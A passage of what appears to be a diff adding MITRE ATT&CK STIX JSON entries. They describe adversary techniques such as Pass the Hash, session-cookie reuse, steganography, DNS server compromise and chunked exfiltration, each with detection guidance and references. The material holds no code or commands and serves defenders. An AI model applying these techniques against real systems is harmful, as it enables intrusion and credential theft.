"x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "x_mitre_version": "2.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b", + "created": "2017-05-31T21:31:10.728Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1095", + "external_id": "T1095" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices" + }, + { + "source_name": "Microsoft ICMP", + "description": "Microsoft. (n.d.). Internet Control Message Protocol (ICMP) Basics. Retrieved December 1, 2014.", + "url": "http://support.microsoft.com/KB/170292" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "Wikipedia OSI", + "description": "Wikipedia. (n.d.). List of network protocols (OSI model). Retrieved December 4, 2014.", + "url": "http://en.wikipedia.org/wiki/List_of_network_protocols_%28OSI_model%29" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Pass the Hash", + "description": "Pass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. \n\nWindows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Travis Smith, Tripwire" + ], + "x_mitre_detection": "Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Requires Microsoft Windows as target system" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "created": "2017-05-31T21:30:59.339Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1075", + "external_id": "T1075" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/644.html", + "external_id": "CAPEC-644" + }, + { + "source_name": "NSA Spotting", + "description": "National Security Agency/Central Security Service Information Assurance Directorate. (2015, August 7). Spotting the Adversary with Windows Event Log Monitoring. Retrieved September 6, 2018.", + "url": "https://apps.nsa.gov/iaarchive/library/reports/spotting-the-adversary-with-windows-event-log-monitoring.cfm" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:10.581Z", + "name": "Replication Through Removable Media", + "description": "Adversaries may move onto systems, such as those separated from the enterprise network, by copying malware to removable media which is inserted into the control systems environment. The adversary may rely on unknowing trusted third parties, such as suppliers or contractors with access privileges, to introduce the removable media. This technique enables initial access to target devices that never connect to untrusted networks, but are physically accessible. \n\nOperators of the German nuclear power plant, Gundremmingen, discovered malware on a facility computer not connected to the internet. (Citation: Kernkraftwerk Gundremmingen April 2016) (Citation: Trend Micro April 2016) The malware included Conficker and W32.Ramnit, which were also found on eighteen removable disk drives in the facility. (Citation: Christoph Steitz, Eric Auchard April 2016) (Citation: Catalin Cimpanu April 2016) (Citation: Peter Dockrill April 2016) (Citation: Lee Mathews April 2016) (Citation: Sean Gallagher April 2016) (Citation: Dark Reading Staff April 2016) The plant has since checked for infection and cleaned up more than 1,000 computers. (Citation: BBC April 2016) An ESET researcher commented that internet disconnection does not guarantee system safety from infection or payload execution. (Citation: ESET April 2016)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Process: Process Creation", + "File: File Creation", + "Drive: Drive Creation", + "File: File Access" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0847", + "external_id": "T0847" + }, + { + "source_name": "BBC April 2016", + "description": "BBC 2016, April 28 German nuclear plant hit by computer viruses Retrieved. 2019/10/14 ", + "url": "https://www.bbc.com/news/technology-36158606" + }, + { + "source_name": "Catalin Cimpanu April 2016", + "description": "Catalin Cimpanu 2016, April 26 Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary Retrieved. 2019/10/14 ", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + }, + { + "source_name": "Christoph Steitz, Eric Auchard April 2016", + "description": "Christoph Steitz, Eric Auchard 2016, April 26 German nuclear plant infected with computer viruses, operator says Retrieved. 2019/10/14 ", + "url": "https://www.reuters.com/article/us-nuclearpower-cyber-germany/german-nuclear-plant-infected-with-computer-viruses-operator-says-idUSKCN0XN2OS" + }, + { + "source_name": "Dark Reading Staff April 2016", + "description": "Dark Reading Staff 2016, April 28 German Nuclear Power Plant Infected With Malware Retrieved. 2019/10/14 ", + "url": "https://www.darkreading.com/endpoint/german-nuclear-power-plant-infected-with-malware/d/d-id/1325298" + }, + { + "source_name": "ESET April 2016", + "description": "ESET 2016, April 28 Malware found at a German nuclear power plant Retrieved. 2019/10/14 ", + "url": "https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/" + }, + { + "source_name": "Kernkraftwerk Gundremmingen April 2016", + "description": "Kernkraftwerk Gundremmingen 2016, April 25 Detektion von Bro-Schadsoftware an mehreren Rechnern Retrieved. 2019/10/14 ", + "url": "https://www.kkw-gundremmingen.de/presse.php?id=571" + }, + { + "source_name": "Lee Mathews April 2016", + "description": "Lee Mathews 2016, April 27 German nuclear plant found riddled with Conficker, other viruses Retrieved. 2019/10/14 ", + "url": "https://www.geek.com/apps/german-nuclear-plant-found-riddled-with-conficker-other-viruses-1653415/" + }, + { + "source_name": "Peter Dockrill April 2016", + "description": "Peter Dockrill 2016, April 28 Multiple Computer Viruses Have Been Discovered in This German Nuclear Plant Retrieved. 2019/10/14 ", + "url": "https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant" + }, + { + "source_name": "Sean Gallagher April 2016", + "description": "Sean Gallagher 2016, April 27 German nuclear plants fuel rod system swarming with old malware Retrieved. 2019/10/14 ", + "url": "https://arstechnica.com/information-technology/2016/04/german-nuclear-plants-fuel-rod-system-swarming-with-old-malware/" + }, + { + "source_name": "Trend Micro April 2016", + "description": "Trend Micro 2016, April 27 Malware Discovered in German Nuclear Power Plant Retrieved. 2019/10/14 ", + "url": "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/malware-discovered-in-german-nuclear-power-plant" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T21:01:48.815Z", + "name": "Steganography", + "description": "Adversaries may use steganography techniques in order to prevent the detection of hidden information. Steganographic techniques can be used to hide data in digital media such as images, audio tracks, video clips, or text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early example of malware that used steganography. It encrypted the gathered information from a victim's system and hid it within an image before exfiltrating the image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916", + "created": "2020-02-05T14:28:16.719Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1027/003", + "external_id": "T1027.003" + }, + { + "source_name": "Wikipedia Duqu", + "description": "Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.", + "url": "https://en.wikipedia.org/wiki/Duqu" + }, + { + "source_name": "McAfee Malicious Doc Targets Pyeongchang Olympics", + "description": "Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.", + "url": "https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "DNS Server", + "description": "Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.\n\nBy compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jeremy Galloway" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring for anomalous resolution changes for domain addresses. Efforts may need to be tailored to specific domains of interest as benign resolution changes are a common occurrence on the internet.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c2f59d25-87fe-44aa-8f83-e8e59d077bf5", + "created": "2020-10-01T00:54:30.869Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1584/002", + "external_id": "T1584.002" + }, + { + "source_name": "FireEye DNS Hijack 2019", + "description": "Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html" + }, + { + "source_name": "Crowdstrike DNS Hijack 2019", + "description": "Matt Dahl. (2019, January 25). Widespread DNS Hijacking Activity Targets Multiple Sectors. Retrieved February 14, 2022.", + "url": "https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/" + }, + { + "source_name": "Talos DNSpionage Nov 2018", + "description": "Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020.", + "url": "https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html" + }, + { + "source_name": "CiscoAngler", + "description": "Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017.", + "url": "https://blogs.cisco.com/security/talos/angler-domain-shadowing" + }, + { + "source_name": "Proofpoint Domain Shadowing", + "description": "Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, 2020.", + "url": "https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Protocol Impersonation", + "description": "Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic. \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look like subsequent traffic is SSL/TLS encrypted, potentially interfering with some security tooling, or to make the traffic look like it is related with a trusted entity. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc", + "created": "2020-03-15T00:40:27.503Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1001/003", + "external_id": "T1001.003" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Query Registry", + "description": "Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.\n\nThe Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nInteraction with the Windows Registry may come from the command line using utilities such as [Reg](https://attack.mitre.org/software/S0075) or through running malware that may interact with the Registry through an API. Command-line invocation of utilities used to query the Registry may be detected through process and command-line monitoring. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c32f7008-9fea-41f7-8366-5eb9b74bd896", + "created": "2017-05-31T21:30:25.584Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1012", + "external_id": "T1012" + }, + { + "source_name": "Wikipedia Windows Registry", + "description": "Wikipedia. (n.d.). Windows Registry. Retrieved February 2, 2015.", + "url": "https://en.wikipedia.org/wiki/Windows_Registry" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Data Transfer Size Limits", + "description": "An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c3888c54-775d-4b2f-b759-75a2ececcbfd", + "created": "2017-05-31T21:30:34.523Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1030", + "external_id": "T1030" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Windows Remote Management", + "description": "Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the winrm command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events. (Citation: Medium Detecting Lateral Movement)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "x_mitre_remote_support": true, + "x_mitre_system_requirements": [ + "WinRM listener turned on and configured on remote system" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c3bce4f4-9795-46c6-976e-8676300bbc39", + "created": "2017-05-31T21:30:33.723Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1028", + "external_id": "T1028" + }, + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/555.html", + "external_id": "CAPEC-555" + }, + { + "source_name": "Microsoft WinRM", + "description": "Microsoft. (n.d.). Windows Remote Management. Retrieved November 12, 2014.", + "url": "http://msdn.microsoft.com/en-us/library/aa384426" + }, + { + "source_name": "Jacobsen 2014", + "description": "Jacobsen, K. (2014, May 16). Lateral Movement with PowerShell[slides]. Retrieved November 12, 2014.", + "url": "https://www.slideshare.net/kieranjacobsen/lateral-movement-with-power-shell-2" + }, + { + "source_name": "Medium Detecting Lateral Movement", + "description": "French, D. (2018, September 30). Detecting Lateral Movement Using Sysmon and Splunk. Retrieved October 11, 2019.", + "url": "https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-19T21:26:24.725Z", + "name": "Web Session Cookie", + "description": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)\n\nAuthentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539) or [Web Cookies](https://attack.mitre.org/techniques/T1606/001), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.\n\nThere have been examples of malware targeting session cookies to bypass multi-factor authentication systems.(Citation: Unit 42 Mac Crypto Cookies January 2019)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Johann Rehberger", + "Jack Burns, HubSpot" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor for anomalous access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Office 365", + "SaaS", + "Google Workspace", + "IaaS" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "System Access Controls" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c3c8c916-2f3c-4e71-94b2-240bdfc996f0", + "created": "2020-01-30T17:48:49.395Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1550/004", + "external_id": "T1550.004" + }, + { + "source_name": "Unit 42 Mac Crypto Cookies January 2019", + "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges’ Cookies. Retrieved October 14, 2019.", + "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/" + }, + { + "source_name": "Pass The Cookie", + "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.", + "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-14T14:55:07.432Z", + "name": "Domain Accounts", + "description": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)\n\nAdversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Jon Sternstein, Stern Security" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).\n\nOn Linux, check logs and other artifacts created by use of domain authentication services, such as the System Security Services Daemon (sssd).(Citation: Ubuntu SSSD Docs) \n\nPerform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.4", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f", + "created": "2020-03-13T20:21:54.758Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1078/002", + "external_id": "T1078.002" + }, + { + "source_name": "TechNet Credential Theft", + "description": "Microsoft. (2016, April 15). Attractive Accounts for Credential Theft. Retrieved June 3, 2016.", + "url": "https://technet.microsoft.com/en-us/library/dn535501.aspx" + }, + { + "source_name": "TechNet Audit Policy", + "description": "Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved June 3, 2016.", + "url": "https://technet.microsoft.com/en-us/library/dn487457.aspx" + }, + { + "source_name": "Microsoft AD Accounts", + "description": "Microsoft. (2019, August 23). Active Directory Accounts. Retrieved March 13, 2020.", + "url": "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts" + }, + { + "source_name": "Ubuntu SSSD Docs", + "description": "Ubuntu. (n.d.). SSSD. Retrieved September 23, 2021.", + "url": "https://ubuntu.com/server/docs/service-sssd" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + 